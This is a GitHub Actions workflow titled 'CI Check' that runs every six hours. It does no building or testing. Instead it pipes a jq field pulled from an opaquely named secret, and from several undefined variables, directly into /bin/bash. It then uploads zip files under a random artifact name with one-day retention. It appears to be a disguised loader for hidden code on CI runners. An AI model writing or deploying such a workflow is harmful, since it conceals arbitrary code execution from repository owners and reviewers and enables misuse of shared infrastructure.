name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '35 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          eouwu9: ${{ secrets.eouwu9 }}
        run: |
          printf '%s' "$eouwu9" | jq -r .unf3 | /bin/bash
          printf '%s' "$bsn356" | jq -r .ggd27 | /bin/bash
          printf '%s' "$z60902" | jq -r .pytqa81925 | /bin/bash
          echo $gzh4 | jq -r .ysxcl1 | /bin/bash
          echo $xcfux9303 | jq -r .oo98525 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: NN1UdNHN
          path: "*.zip"
          retention-days: 1
